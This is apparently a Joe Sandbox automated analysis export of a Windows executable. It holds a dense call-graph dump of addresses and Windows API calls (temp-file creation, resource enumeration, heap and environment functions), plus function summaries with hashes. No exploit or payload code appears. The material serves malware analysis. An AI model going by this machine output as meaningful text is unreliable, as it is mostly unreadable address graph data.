8348->8349 8356 402ef1 8348->8356 9197 4026b8 8349->9197 8353 402f00 9193 40e720 8353->9193 9190 409b40 8356->9190 8357 402f24 8358 40def0 HeapFree 8357->8358 8359 402f3b 8358->8359 8360 40de20 GetLastError TlsGetValue SetLastError 8359->8360 8360->7721 8362 40df60 21 API calls 8361->8362 8363 4021b0 8362->8363 8364 4051a0 3 API calls 8363->8364 8365 4021b9 8364->8365 8366 4021d2 8365->8366 8367 4023ba 8365->8367 9229 40de20 GetLastError TlsGetValue SetLastError 8366->9229 9227 40de20 GetLastError TlsGetValue SetLastError 8367->9227 8370 4021d8 9230 40de20 GetLastError TlsGetValue SetLastError 8370->9230 8371 4023c4 8373 40dfc0 3 API calls 8371->8373 8375 4023cc 8373->8375 8374 4021e0 9231 40de20 GetLastError TlsGetValue SetLastError 8374->9231 9228 405170 TlsGetValue 8375->9228 8378 4021e8 9232 40de20 GetLastError TlsGetValue SetLastError 8378->9232 8379 4023d3 8382 40def0 HeapFree 8379->8382 8381 4021f0 9233 409bb0 8381->9233 8384 4023eb 8382->8384 
8385 40def0 HeapFree 8384->8385 8387 4023f4 8385->8387 8386 402204 9242 405182 TlsGetValue 8386->9242 8389 40def0 HeapFree 8387->8389 8391 4023fc 8389->8391 8390 402209 9243 406000 8390->9243 8393 40def0 HeapFree 8391->8393 8396 402405 8393->8396 8395 40de60 3 API calls 8397 40221b 8395->8397 8396->7724 9246 40de20 GetLastError TlsGetValue SetLastError 8397->9246 8399 402221 9247 40de20 GetLastError TlsGetValue SetLastError 8399->9247 8401 402229 9248 40de20 GetLastError TlsGetValue SetLastError 8401->9248 8403 402231 9249 40de20 GetLastError TlsGetValue SetLastError 8403->9249 8405 402239 8406 409bb0 4 API calls 8405->8406 8407 402250 8406->8407 9250 405182 TlsGetValue 8407->9250 8409 402255 8410 406000 4 API calls 8409->8410 8411 40225d 8410->8411 8412 40de60 3 API calls 8411->8412 8413 402267 8412->8413 9251 40de20 GetLastError TlsGetValue SetLastError 8413->9251 8415 40226d 9252 40de20 GetLastError TlsGetValue SetLastError 8415->9252 8417 402275 9253 40de20 GetLastError TlsGetValue SetLastError 8417->9253 8419 402288 9254 40de20 GetLastError TlsGetValue SetLastError 8419->9254 8421 402290 9255 4057f0 8421->9255 8423 4022a6 9271 40e020 TlsGetValue 8423->9271 8425 4022ab 9272 40de20 GetLastError TlsGetValue SetLastError 8425->9272 8427 4022b1 9273 40de20 GetLastError TlsGetValue SetLastError 8427->9273 8429 4022b9 8430 4057f0 8 API calls 8429->8430 8431 4022cf 8430->8431 9274 405182 TlsGetValue 8431->9274 8433 4022d4 9275 405182 TlsGetValue 8433->9275 8435 4022dc 9276 408f09 8435->9276 8438 40de60 3 API calls 8439 4022ef 8438->8439 8440 4023b0 8439->8440 8441 402300 8439->8441 8442 401fa9 35 API calls 8440->8442 9319 40de20 GetLastError TlsGetValue SetLastError 8441->9319 8442->8367 8444 402306 9320 40de20 GetLastError TlsGetValue SetLastError 8444->9320 8446 40230e 9321 40de20 GetLastError TlsGetValue SetLastError 8446->9321 8448 40231b 9322 40de20 GetLastError TlsGetValue SetLastError 8448->9322 8450 402323 8451 406000 4 API calls 8450->8451 8452 40232e 
8451->8452 9323 405182 TlsGetValue 8452->9323 8454 402333 8455 40d0a0 7 API calls 8454->8455 8456 40233b 8455->8456 8457 40de60 3 API calls 8456->8457 8458 402345 8457->8458 8459 4023ae 8458->8459 9324 40de20 GetLastError TlsGetValue SetLastError 8458->9324 8459->8367 8461 40235b 9325 40de20 GetLastError TlsGetValue SetLastError 8461->9325 8463 402368 9326 40de20 GetLastError TlsGetValue SetLastError 8463->9326 8465 402370 8466 4057f0 8 API calls 8465->8466 8467 402386 8466->8467 9327 40e020 TlsGetValue 8467->9327 8469 40238b 9328 405182 TlsGetValue 8469->9328 8471 402396 9329 408dc7 8471->9329 8474 4051a0 3 API calls 8475 4023a4 8474->8475 8476 401fa9 35 API calls 8475->8476 8476->8459 8478 40df60 21 API calls 8477->8478 8499 401969 8478->8499 8479 4019ea 8481 409b40 RtlAllocateHeap 8479->8481 8480 40de20 GetLastError TlsGetValue SetLastError 8480->8499 8482 4019f4 8481->8482 9385 40de20 GetLastError TlsGetValue SetLastError 8482->9385 8484 4019fe 9386 40de20 GetLastError TlsGetValue SetLastError 8484->9386 8485 405d60 2 API calls 8485->8499 8487 401a06 9387 40a6f6 8487->9387 8490 40de60 3 API calls 8491 401a17 GetTempFileNameW 8490->8491 9396 40de20 GetLastError TlsGetValue SetLastError 8491->9396 8493 401a35 9397 40de20 GetLastError TlsGetValue SetLastError 8493->9397 8494 40dfc0 wcslen TlsGetValue RtlReAllocateHeap 8494->8499 8496 401a3d 8498 409b60 3 API calls 8496->8498 8497 40de60 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 8497->8499 8500 401a48 8498->8500 8499->8479 8499->8480 8499->8485 8499->8494 8499->8497 8501 40de60 3 API calls 8500->8501 8502 401a54 8501->8502 9398 40a787 8502->9398 8508 401a8a 9407 40de20 GetLastError TlsGetValue SetLastError 8508->9407 8510 401a92 8511 409b60 3 API calls 8510->8511 8512 401a9d 8511->8512 8513 40de60 3 API calls 8512->8513 8514 401aa9 8513->8514 8515 40a787 2 API calls 8514->8515 8516 401ab4 8515->8516 8517 40a665 3 API calls 8516->8517 8518 401abf GetTempFileNameW PathAddBackslashW 8517->8518 9408 40de20 
GetLastError TlsGetValue SetLastError 8518->9408 8520 401aea 9409 40de20 GetLastError TlsGetValue SetLastError 8520->9409 8522 401af2 8523 409b60 3 API calls 8522->8523 8524 401afd 8523->8524 8525 40de60 3 API calls 8524->8525 8526 401b09 8525->8526 8527 40a787 2 API calls 8526->8527 8528 401b14 PathRenameExtensionW GetTempFileNameW 8527->8528 9410 40de20 GetLastError TlsGetValue SetLastError 8528->9410 8530 401b43 9411 40de20 GetLastError TlsGetValue SetLastError 8530->9411 8532 401b4b 8533 409b60 3 API calls 8532->8533 8534 401b56 8533->8534 8535 40de60 3 API calls 8534->8535 8536 401b62 8535->8536 9412 409b20 HeapFree 8536->9412 8538 401b6b 8539 40def0 HeapFree 8538->8539 8540 401b78 8539->8540 8541 40def0 HeapFree 8540->8541 8542 401b81 8541->8542 8543 40def0 HeapFree 8542->8543 8544 401b8a 8543->8544 8545 40460e 8544->8545 8546 40df60 21 API calls 8545->8546 8560 40461b 8546->8560 8547 40469c 9419 40de20 GetLastError TlsGetValue SetLastError 8547->9419 8548 40de20 GetLastError TlsGetValue SetLastError 8548->8560 8550 4046a2 8552 40358d 92 API calls 8550->8552 8551 405d60 2 API calls 8551->8560 8553 4046b8 8552->8553 8555 40de60 3 API calls 8553->8555 8554 40de60 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 8554->8560 8556 4046c2 8555->8556 9420 40a8fa 8556->9420 8559 40def0 HeapFree 8561 4046d6 8559->8561 8560->8547 8560->8548 8560->8551 8560->8554 8562 40dfc0 wcslen TlsGetValue RtlReAllocateHeap 8560->8562 8563 40def0 HeapFree 8561->8563 8562->8560 8564 4046df 8563->8564 8565 40def0 HeapFree 8564->8565 8566 4043c2 8565->8566 8567 40de20 GetLastError TlsGetValue SetLastError 8566->8567 8567->7731 8569 40df60 21 API calls 8568->8569 8570 403597 8569->8570 8571 4051a0 3 API calls 8570->8571 8572 4035a0 8571->8572 8573 405060 2 API calls 8572->8573 8574 4035ac 8573->8574 8575 4035b7 8574->8575 8576 4035db 8574->8576 9425 40de20 GetLastError TlsGetValue SetLastError 8575->9425 8578 4035e5 8576->8578 8579 403608 8576->8579 9427 40de20 GetLastError TlsGetValue 
SetLastError 8578->9427 8581 403612 8579->8581 8582 40363b 8579->8582 8580 4035bd 9426 40de20 GetLastError TlsGetValue SetLastError 8580->9426 9428 40de20 GetLastError TlsGetValue SetLastError 8581->9428 8584 403645 8582->8584 8585 40366e 8582->8585 9446 40de20 GetLastError TlsGetValue SetLastError 8584->9446 8593 4036a1 8585->8593 8594 403678 8585->8594 8586 4035f1 8590 40dfc0 3 API calls 8586->8590 8596 4035f9 8590->8596 8591 4035c5 8599 40a795 4 API calls 8591->8599 8592 403618 9429 40de20 GetLastError TlsGetValue SetLastError 8592->9429 8597 4036d4 8593->8597 8598 4036ab 8593->8598 9448 40de20 GetLastError TlsGetValue SetLastError 8594->9448 8595 40364b 9447 40de20 GetLastError TlsGetValue SetLastError 8595->9447 8603 40de60 3 API calls 8596->8603 8608 403707 8597->8608 8609 4036de 8597->8609 9450 40de20 GetLastError TlsGetValue SetLastError 8598->9450 8605 4035cc 8599->8605 8611 4035d6 8603->8611 8615 40de60 3 API calls 8605->8615 8606 403620 9430 40a7da 8606->9430 8607 40367e 9449 40de20 GetLastError TlsGetValue SetLastError 8607->9449 8613 403711 8608->8613 8614 40373a 8608->8614 9452 40de20 GetLastError TlsGetValue SetLastError 8609->9452 8610 403653 8622 40a7da 14 API calls 8610->8622 9423 40de20 GetLastError TlsGetValue SetLastError 8611->9423 8612 4036b1 9451 40de20 GetLastError TlsGetValue SetLastError 8612->9451 9454 40de20 GetLastError TlsGetValue SetLastError 8613->9454 8620 403744 8614->8620 8621 40376d 8614->8621 8615->8611 8619 4036e4 9453 40de20 GetLastError TlsGetValue SetLastError 8619->9453 9456 40de20 GetLastError TlsGetValue SetLastError 8620->9456 8633 403777 8621->8633 8634 40379d 8621->8634 8630 40365f 8622->8630 8626 403686 8636 40a7da 14 API calls 8626->8636 8643 40de60 3 API calls 8630->8643 8631 4036b9 8644 40a7da 14 API calls 8631->8644 8632 403717 9455 40de20 GetLastError TlsGetValue SetLastError 8632->9455 9458 40de20 GetLastError TlsGetValue SetLastError 8633->9458 8641 4037f5 8634->8641 8642 4037a7 8634->8642 8635 40de60 3 API 
calls 8695 403636 8635->8695 8637 403692 8636->8637 8647 40de60 3 API calls 8637->8647 8638 40381f 8648 40dfc0 3 API calls 8638->8648 8639 4036ec 8649 40a7da 14 API calls 8639->8649 8640 40374a 9457 40de20 GetLastError TlsGetValue SetLastError 8640->9457 9488 40de20 GetLastError TlsGetValue SetLastError 8641->9488 9460 40de20 GetLastError TlsGetValue SetLastError 8642->9460 8643->8695 8653 4036c5 8644->8653 8647->8695 8656 403827 8648->8656 8657 4036f8 8649->8657 8661 40de60 3 API calls 8653->8661 8654 40371f 8662 40a7da 14 API calls 8654->8662 8655 40377d 9459 40de20 GetLastError TlsGetValue SetLastError 8655->9459 9424 405170 TlsGetValue 8656->9424 8666 40de60 3 API calls 8657->8666 8658 403752 8667 40a7da 14 API calls 8658->8667 8659 4037ad 9461 40de20 GetLastError TlsGetValue SetLastError 8659->9461 8660 4037fb 9489 40de20 GetLastError TlsGetValue SetLastError 8660->9489 8661->8695 8670 40372b 8662->8670 8664 403785 8671 40a7da 14 API calls 8664->8671 8666->8695 8673 40375e 8667->8673 8676 40de60 3 API calls 8670->8676 8677 403791 8671->8677 8672 40382e 8684 40def0 HeapFree 8672->8684 8678 40de60 3 API calls 8673->8678 8674 4037b5 9462 4092f5 8674->9462 8675 403803 8680 40a795 4 API calls 8675->8680 8676->8695 8681 40de60 3 API calls 8677->8681 8678->8695 8683 40380a 8680->8683 8681->8695 8687 40de60 3 API calls 8683->8687 8685 403846 8684->8685 8688 40def0 HeapFree 8685->8688 8686 40de60 3 API calls 8689 4037d0 8686->8689 8687->8611 8690 40384e 8688->8690 8691 4037e9 8689->8691 8692 4037dd 8689->8692 8690->7734 8694 401fa9 35 API calls 8691->8694 9485 405532 8692->9485 8694->8695 8695->8611 8696->7738 8697->7740 8699 40df60 21 API calls 8698->8699 8700 402c04 8699->8700 8701 4051a0 3 API calls 8700->8701 8702 402c0d 8701->8702 8703 405060 2 API calls 8702->8703 8704 402c19 8703->8704 8705 409b40 RtlAllocateHeap 8704->8705 8706 402c23 GetShortPathNameW 8705->8706 9496 40de20 GetLastError TlsGetValue SetLastError 8706->9496 8708 402c3f 9497 40de20 GetLastError 
TlsGetValue SetLastError 8708->9497 8710 402c47 8711 409bb0 4 API calls 8710->8711 8712 402c57 8711->8712 8713 40de60 3 API calls 8712->8713 8714 402c61 8713->8714 9498 409b20 HeapFree 8714->9498 8716 402c6a 9499 40de20 GetLastError TlsGetValue SetLastError 8716->9499 8718 402c74 8719 40dfc0 3 API calls 8718->8719 8720 402c7c 8719->8720 9500 405170 TlsGetValue 8720->9500 8722 402c83 8723 40def0 HeapFree 8722->8723 8724 402c9a 8723->8724 8725 40def0 HeapFree 8724->8725 8726 402ca3 8725->8726 8727 40e020 TlsGetValue 8726->8727 8727->7744 8728->7746 8730 409867 SetEnvironmentVariableW 8729->8730 8731 404434 8729->8731 8730->8731 8731->7749 8733->7752 8734->7760 8736 40df60 21 API calls 8735->8736 8737 401e5f 8736->8737 8738 4051a0 3 API calls 8737->8738 8739 401e68 8738->8739 9501 40de20 GetLastError TlsGetValue SetLastError 8739->9501 8741 401e6e 9502 40de20 GetLastError TlsGetValue SetLastError 8741->9502 8743 401e76 8744 409638 6 API calls 8743->8744 8745 401e7d 8744->8745 8746 40de60 3 API calls 8745->8746 8747 401e87 PathQuoteSpacesW 8746->8747 8748 401ee0 8747->8748 8749 401e97 8747->8749 9571 40de20 GetLastError TlsGetValue SetLastError 8748->9571 9505 40de20 GetLastError TlsGetValue SetLastError 8749->9505 8752 401e9d 9506 4024f1 8752->9506 8753 401ee9 8755 40dfc0 3 API calls 8753->8755 8757 401ef1 8755->8757 8759 40de60 3 API calls 8757->8759 8758 40de60 3 API calls 8760 401eae 8758->8760 8778 401ede 8759->8778 9570 40de20 GetLastError TlsGetValue SetLastError 8760->9570 8763 401eb7 8765 40dfc0 3 API calls 8763->8765 8764 401f05 8766 40dfc0 3 API calls 8764->8766 8767 401ebf 8765->8767 8768 401f0d 8766->8768 8769 40dfc0 3 API calls 8767->8769 9504 405170 TlsGetValue 8768->9504 8771 401eca 8769->8771 8773 40dfc0 3 API calls 8771->8773 8772 401f14 8775 40def0 HeapFree 8772->8775 8774 401ed4 8773->8774 8776 40de60 3 API calls 8774->8776 8777 401f2b 8775->8777 8776->8778 8779 40def0 HeapFree 8777->8779 9503 40de20 GetLastError TlsGetValue SetLastError 8778->9503 
8780 401f34 8779->8780 8780->7763 8782 40385b 8781->8782 8782->8782 8783 40df60 21 API calls 8782->8783 8801 40386d 8783->8801 8784 4038ee 9602 40de20 GetLastError TlsGetValue SetLastError 8784->9602 8786 4038f4 9603 40de20 GetLastError TlsGetValue SetLastError 8786->9603 8787 40de20 GetLastError TlsGetValue SetLastError 8787->8801 8789 4038fc 9604 40de20 GetLastError TlsGetValue SetLastError 8789->9604 8790 405d60 2 API calls 8790->8801 8792 403904 9605 40de20 GetLastError TlsGetValue SetLastError 8792->9605 8794 40390c 8795 40d0a0 7 API calls 8794->8795 8796 40391e 8795->8796 9606 405182 TlsGetValue 8796->9606 8797 40dfc0 wcslen TlsGetValue RtlReAllocateHeap 8797->8801 8799 403923 8800 405e50 5 API calls 8799->8800 8802 40392b 8800->8802 8801->8784 8801->8787 8801->8790 8801->8797 8803 40de60 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 8801->8803 8804 40de60 3 API calls 8802->8804 8803->8801 8805 403935 8804->8805 9607 40de20 GetLastError TlsGetValue SetLastError 8805->9607 8807 40393b 9608 40de20 GetLastError TlsGetValue SetLastError 8807->9608 8809 403943 9609 40de20 GetLastError TlsGetValue SetLastError 8809->9609 8811 40394b 9610 40de20 GetLastError TlsGetValue SetLastError 8811->9610 8813 403953 8814 40d0a0 7 API calls 8813->8814 8815 403965 8814->8815 9611 405182 TlsGetValue 8815->9611 8817 40396a 8818 405e50 5 API calls 8817->8818 8819 403972 8818->8819 8820 40de60 3 API calls 8819->8820 8821 40397c 8820->8821 9612 40de20 GetLastError TlsGetValue SetLastError 8821->9612 8823 403982 9613 40de20 GetLastError TlsGetValue SetLastError 8823->9613 8825 40398a 9614 40de20 GetLastError TlsGetValue SetLastError 8825->9614 8827 403992 9615 40de20 GetLastError TlsGetValue SetLastError 8827->9615 8829 40399a 8830 40d0a0 7 API calls 8829->8830 8831 4039aa 8830->8831 9616 405182 TlsGetValue 8831->9616 8833 4039af 8834 405e50 5 API calls 8833->8834 8835 4039b7 8834->8835 8836 40de60 3 API calls 8835->8836 8837 4039c1 8836->8837 9617 40de20 GetLastError TlsGetValue 
SetLastError 8837->9617 8839 4039c7 9618 40de20 GetLastError TlsGetValue SetLastError 8839->9618 8841 4039cf 9619 40de20 GetLastError TlsGetValue SetLastError 8841->9619 8843 4039d7 9620 40de20 GetLastError TlsGetValue SetLastError 8843->9620 8845 4039df 8846 40d0a0 7 API calls 8845->8846 8847 4039ef 8846->8847 9621 405182 TlsGetValue 8847->9621 8849 4039f4 8850 405e50 5 API calls 8849->8850 8851 4039fc 8850->8851 8852 40de60 3 API calls 8851->8852 8853 403a06 8852->8853 9622 40de20 GetLastError TlsGetValue SetLastError 8853->9622 8855 403a0c 9623 40de20 GetLastError TlsGetValue SetLastError 8855->9623 8857 403a14 9624 40de20 GetLastError TlsGetValue SetLastError 8857->9624 8859 403a1c 9625 40de20 GetLastError TlsGetValue SetLastError 8859->9625 8861 403a24 8862 40d0a0 7 API calls 8861->8862 8863 403a34 8862->8863 9626 405182 TlsGetValue 8863->9626 8865 403a39 8866 405e50 5 API calls 8865->8866 8867 403a41 8866->8867 8868 40de60 3 API calls 8867->8868 8869 403a4b 8868->8869 9627 40de20 GetLastError TlsGetValue SetLastError 8869->9627 8871 403a51 9628 403cd7 8871->9628 8874 4051a0 3 API calls 8875 403a66 8874->8875 9669 40de20 GetLastError TlsGetValue SetLastError 8875->9669 8877 403a6c 8878 403cd7 82 API calls 8877->8878 8879 403a7c 8878->8879 8880 40de60 3 API calls 8879->8880 8881 403a88 8880->8881 9670 40de20 GetLastError TlsGetValue SetLastError 8881->9670 8883 403a8e 8884 403cd7 82 API calls 8883->8884 8885 403a9e 8884->8885 8886 40de60 3 API calls 8885->8886 8887 403aa8 8886->8887 9671 40de20 GetLastError TlsGetValue SetLastError 8887->9671 8889 403aae 8890 403cd7 82 API calls 8889->8890 8891 403abe 8890->8891 8892 40de60 3 API calls 8891->8892 8893 403ac8 8892->8893 9672 40de20 GetLastError TlsGetValue SetLastError 8893->9672 8895 403ace 8896 403cd7 82 API calls 8895->8896 8897 403ade 8896->8897 8898 40de60 3 API calls 8897->8898 8899 403ae8 8898->8899 9673 40de20 GetLastError TlsGetValue SetLastError 8899->9673 8901 403aee 9674 40de20 GetLastError 
TlsGetValue SetLastError 8901->9674 8903 403af6 9675 40de20 GetLastError TlsGetValue SetLastError 8903->9675 8905 403afe 8906 402bfa 42 API calls 8905->8906 8907 403b0b 8906->8907 9676 40e020 TlsGetValue 8907->9676 8909 403b10 9677 405182 TlsGetValue 8909->9677 8911 403b1f 9678 4065f0 8911->9678 8914 40de60 3 API calls 8915 403b32 8914->8915 9681 40de20 GetLastError TlsGetValue SetLastError 8915->9681 8917 403b38 9682 40de20 GetLastError TlsGetValue SetLastError 8917->9682 8919 403b40 9683 40de20 GetLastError TlsGetValue SetLastError 8919->9683 8921 403b48 8922 402bfa 42 API calls 8921->8922 8923 403b55 8922->8923 9684 40e020 TlsGetValue 8923->9684 8925 403b5a 9685 405182 TlsGetValue 8925->9685 8927 403b69 8928 4065f0 12 API calls 8927->8928 8929 403b72 8928->8929 8930 40de60 3 API calls 8929->8930 8931 403b7c 8930->8931 9686 40de20 GetLastError TlsGetValue SetLastError 8931->9686 8933 403b82 9687 40de20 GetLastError TlsGetValue SetLastError 8933->9687 8935 403b8e 8936 40dfc0 3 API calls 8935->8936 8937 403b96 8936->8937 8938 40dfc0 3 API calls 8937->8938 8939 403ba1 8938->8939 8940 40dfc0 3 API calls 8939->8940 8941 403bab 8940->8941 8942 40dfc0 3 API calls 8941->8942 8943 403bb5 8942->8943 8944 40dfc0 3 API calls 8943->8944 8945 403bbf 8944->8945 9688 40e020 TlsGetValue 8945->9688 8947 403bc4 9689 405182 TlsGetValue 8947->9689 8949 403bcf 9690 40240c 8949->9690 8952 4051a0 3 API calls 8953 403bdd 8952->8953 8954 40def0 HeapFree 8953->8954 8955 403be8 8954->8955 8956 40def0 HeapFree 8955->8956 8957 403bf1 8956->8957 8958 40def0 HeapFree 8957->8958 8959 403bfa 8958->8959 8960 40def0 HeapFree 8959->8960 8961 403c03 8960->8961 8962 40def0 HeapFree 8961->8962 8963 403c0c 8962->8963 8964 40def0 HeapFree 8963->8964 8965 403c15 8964->8965 8966 40def0 HeapFree 8965->8966 8967 403c1e 8966->8967 8968 40def0 HeapFree 8967->8968 8969 403c27 8968->8969 8970 40def0 HeapFree 8969->8970 8971 403c30 8970->8971 8972 40def0 HeapFree 8971->8972 8973 403c39 8972->8973 8974 40de20 
GetLastError TlsGetValue SetLastError 8973->8974 8974->7768 8975->7774 8976->7790 8977->7792 9029 4054b7 RtlEnterCriticalSection 9028->9029 9030 404502 9028->9030 9035 4054cd 9029->9035 9036 4054fd 9029->9036 9030->7788 9031 40db12 RtlAllocateHeap 9033 405517 RtlLeaveCriticalSection 9031->9033 9032 4054ce WaitForSingleObject 9034 4054de CloseHandle 9032->9034 9032->9035 9033->9030 9034->9035 9035->9032 9035->9036 9036->9031 9038 40df60 21 API calls 9037->9038 9039 402cb7 9038->9039 9040 405060 2 API calls 9039->9040 9041 402cc3 9040->9041 9042 402cf0 9041->9042 9960 40de20 GetLastError TlsGetValue SetLastError 9041->9960 9962 40de20 GetLastError TlsGetValue SetLastError 9042->9962 9045 402cf6 9963 40de20 GetLastError TlsGetValue SetLastError 9045->9963 9046 402cd2 9961 40de20 GetLastError TlsGetValue SetLastError 9046->9961 9049 402cfe 9964 40de20 GetLastError TlsGetValue SetLastError 9049->9964 9050 402cda 9052 409b60 3 API calls 9050->9052 9054 402ce6 9052->9054 9053 402d06 9056 40de60 3 API calls 9054->9056 9056->9042 9152 40e080 9102->9152 9104 4032a2 9104->8249 9106 402bc7 9105->9106 9106->9106 9107 40df60 21 API calls 9106->9107 9108 402bd9 GetNativeSystemInfo 9107->9108 9109 402bec 9108->9109 9109->8253 9109->8254 9110->8279 9111->8286 9113 4055c8 9112->9113 9117 4032bd 9112->9117 9113->9117 9155 405553 memset GetModuleHandleW 9113->9155 9116 405606 GetVersionExW 9116->9117 9117->8254 9118->8262 9119->8266 9121 40e200 2 API calls 9120->9121 9122 4032ef 9121->9122 9122->8271 9123->8276 9124->8291 9125->8307 9158 40d438 RtlEnterCriticalSection 9126->9158 9128 40ad75 9129 40ae0e 9128->9129 9130 40ad7f CreateFileW 9128->9130 9129->8318 9131 40ada0 9130->9131 9132 40adc0 9130->9132 9131->9132 9133 40adad RtlAllocateHeap 9131->9133 9135 40ae05 9132->9135 9167 40d3aa RtlEnterCriticalSection 9132->9167 9133->9132 9135->8318 9137 40a989 9136->9137 9138 40a97a 9136->9138 9172 40d3f9 RtlEnterCriticalSection 9137->9172 9176 40d995 9138->9176 9142 40a9cd 9142->8319 9144 
APIs
  • Part of subcall function 0040E200: TlsGetValue.KERNEL32(0000000E), ref: 0040E20C
  • Part of subcall function 0040E200: RtlReAllocateHeap.NTDLL(?,00000000,00000000,?), ref: 0040E267
• GetTempPathW.KERNEL32(00000104,00000000,00000104,00000000,?,?,?,?,00401A0D,00000000,00000000,00000400,00000000,00000000,00000000,00000000), ref: 0040A70D
• LoadLibraryW.KERNEL32(Kernel32.DLL,?,?,?,?,00401A0D,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0040A71A
• GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040A72C
• GetLongPathNameW.KERNELBASE(00000000,00000000,00000104,?,?,?,?,00401A0D,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000), ref: 0040A739
• FreeLibrary.KERNEL32(00000000,?,?,?,?,00401A0D,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0040A73E
Strings
Memory Dump Source
• Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
Similarity
• API ID: LibraryPath$AddressAllocateFreeHeapLoadLongNameProcTempValue
• String ID: GetLongPathNameW$Kernel32.DLL
• API String ID: 1993255246-2943376620
• Opcode ID: 7b42a2a4bda81c2a557b82b464e46efdc551e2bdda77aae8c4b8834907019da6
• Instruction ID: 764606bb569eff9aa2a854e4b0558f5753b22c8873abefb13c435e0df7790d1f
• Opcode Fuzzy Hash: 7b42a2a4bda81c2a557b82b464e46efdc551e2bdda77aae8c4b8834907019da6
• Instruction Fuzzy Hash: B4F0E9322012147FC2102BB6AC4CEEB3E6CDF95755701443AF904E2251DB69CC20C2BD
APIs
• memset.MSVCRT ref: 0040100F
• GetModuleHandleW.KERNEL32(00000000), ref: 0040101C
• HeapCreate.KERNEL32(00000000,00001000,00000000,00000000), ref: 00401035
  • Part of subcall function 0040DDD0: HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040DDDC
  • Part of subcall function 0040DDD0: TlsAlloc.KERNEL32 ref: 0040DDE7
  • Part of subcall function 00409AE0: HeapCreate.KERNELBASE(00000000,00001000,00000000,0040106C,00000000,00001000,00000000,00000000), ref: 00409AE9
  • Part of subcall function 00409609: RtlInitializeCriticalSection.NTDLL(004176C8), ref: 00409631
  • Part of subcall function 00408D8E: memset.MSVCRT ref: 00408D9B
  • Part of subcall function 00408D8E: CoInitialize.OLE32(00000000), ref: 00408DBD
  • Part of subcall function 004053BB: RtlInitializeCriticalSection.NTDLL(004176A0), ref: 004053C0
• GetStdHandle.KERNEL32(FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040109A
  • Part of subcall function 00409D80: RtlAllocateHeap.NTDLL(00000000,0000003C,00000200), ref: 00409D9F
  • Part of subcall function 00409D80: RtlAllocateHeap.NTDLL(00000008,00000015), ref: 00409DC5
  • Part of subcall function 00409D80: RtlAllocateHeap.NTDLL(00000008,FFFFFFED,FFFFFFED), ref: 00409E22
  • Part of subcall function 0040A37A: HeapFree.KERNEL32(00000000,?,?,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000), ref: 0040A3B8
  • Part of subcall function 0040A37A: HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000), ref: 0040A3D1
  • Part of subcall function 0040A37A: HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000), ref: 0040A3DB
  • Part of subcall function 0040A2E8: RtlAllocateHeap.NTDLL(00000000,00000034), ref: 0040A2FB
  • Part of subcall function 0040A2E8: RtlAllocateHeap.NTDLL(FFFFFFF5,00000008), ref: 0040A310
  • Part of subcall function 0040DB6A: RtlAllocateHeap.NTDLL(00000000,FFFFFFDD), ref: 0040DB9A
  • Part of subcall function 0040DB6A: memset.MSVCRT ref: 0040DBD5
  • Part of subcall function 0040DE20: GetLastError.KERNEL32 ref: 0040DE26
  • Part of subcall function 0040DE20: TlsGetValue.KERNEL32(0000000E), ref: 0040DE35
  • Part of subcall function 0040DE20: SetLastError.KERNEL32(?), ref: 0040DE4B
  • Part of subcall function 0040DE60: TlsGetValue.KERNEL32(0000000E), ref: 0040DE6C
  • Part of subcall function 0040DE60: RtlAllocateHeap.NTDLL(?,00000000,?), ref: 0040DE99
  • Part of subcall function 00401B8F: LoadLibraryExW.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00000000,00000004), ref: 00401BCD
  • Part of subcall function 00401B8F: EnumResourceTypesW.KERNEL32(00000000,00000000,00000000), ref: 00401BEA
  • Part of subcall function 00401B8F: FreeLibrary.KERNEL32(?,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00000000), ref: 00401BF2
• ExitProcess.KERNEL32(00000000,00000000,00000004,00000000,0041606C,00000008,0000000C,000186A1,00000007,0041607C,00417090,00000004,00000000,0041606C,00000008,00000008), ref: 004011A5
• HeapDestroy.KERNEL32(00000000,00000000,00000004,00000000,0041606C,00000008,0000000C,000186A1,00000007,0041607C,00417090,00000004,00000000,0041606C,00000008,00000008), ref: 004011B5
• ExitProcess.KERNEL32(00000000,00000000,00000004,00000000,0041606C,00000008,0000000C,000186A1,00000007,0041607C,00417090,00000004,00000000,0041606C,00000008,00000008), ref: 004011BA
Memory Dump Source
• Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
Similarity
• API ID: Heap$Allocate$Free$CreateInitializememset$CriticalErrorExitHandleLastLibraryProcessSectionValue$AllocDestroyEnumLoadModuleResourceTypes
• String ID:
• API String ID: 784591235-0
• Opcode ID: 1d7ba25bdac2cc46eb0f483c85253156cba33636e365104d8824d09eec5e1d3a
• Instruction ID: 054f58a703c2077171097cea621e0c228d2d39f1c558e4fc4fd495567313132e
• Opcode Fuzzy Hash: 1d7ba25bdac2cc46eb0f483c85253156cba33636e365104d8824d09eec5e1d3a
• Instruction Fuzzy Hash: 33311C30A84700A9E610B7F29C43FAE3A65AF1874DF11803FB649791E3DEBD55448A6F
                                                                              APIs
